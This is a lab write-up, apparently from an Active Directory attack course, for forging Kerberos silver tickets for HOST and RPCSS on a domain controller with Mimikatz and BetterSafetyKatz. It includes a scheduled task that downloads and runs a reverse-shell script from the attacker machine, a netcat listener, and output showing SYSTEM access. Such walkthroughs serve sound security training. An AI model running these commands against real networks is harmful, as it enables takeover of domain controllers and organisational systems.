Obj 9 Silver Ticket for Host

Task Get command execution on DC by creating a silver ticket for Host Service, WMI.

From the information gathered in previous steps we have the hash for machine account of the domain controller (dcorp-dc$). We are going to use this information to create a silver ticket for the Host service on the DC.

Run the following command from an elevated shell

Silver Ticket - BetterSafetyKatz

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Silver Ticket - Mimikatz

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c/startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Start a netcat listener on the student vm

nc64.exe -lvnp 443

We need to run a modified reverse powershell script

Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1.
-Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (Right click on it and click Edit).
-Add Power -Reverse -IPAddress 172.16.100.X-Port 443
to the end of the file.

Remember to serve this newly created file up on HFS.exe or similar

Now, Lets create a task on the DC to download our new script

schtasks /create /S dcorp-dc /SC Weekly /RU "NT Authority\SYSTEM" /TN "UserX" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/Invoke-PowerShellTcpEx.ps1''')'"

Now we can run the task to run our script

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "UserX"

We should have gotten a call back on our listener as nt/authority!

PS C:\Windows\system32>hostname
dcorp-dcPS 
C:\Windows\system32> whoami
nt authority\system

- PART 2 - This is the same result as above just another way to do it

For accessing WMI, we need to create two tickets –one for HOST service and another for RPCSS.Run the below commands from an elevated shell:

Create Silver Ticket

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local/service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Inject a ticket for RPCSS

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:1e16be70054d1c5999aa53994e03e59c/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Check to make sure the ticket is present

klist

#0> Client: Administrator @ dollarcorp.moneycorp.local

Server: RPCSS/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)Ticket Flags 0x40a00000 -> forwardable renewable pre_authentStart Time: 11/16/2021 13:36:23 (local)End Time: 11/16/2021 23:36:23 (local)Renew Time: 11/23/2021 13:36:23 (local)Session Key Type: RSADSI RC4-HMAC(NT)Cache Flags: 0Kdc Called:

#1> Client: Administrator @ dollarcorp.moneycorp.local

Server: HOST/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local

Now we can try to run WMI commands on the DC

PS C:\AD\Tools> Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
PreviousObj 8 Golden Ticket / DCSyncNextObj 10 Skeleton Key

Last updated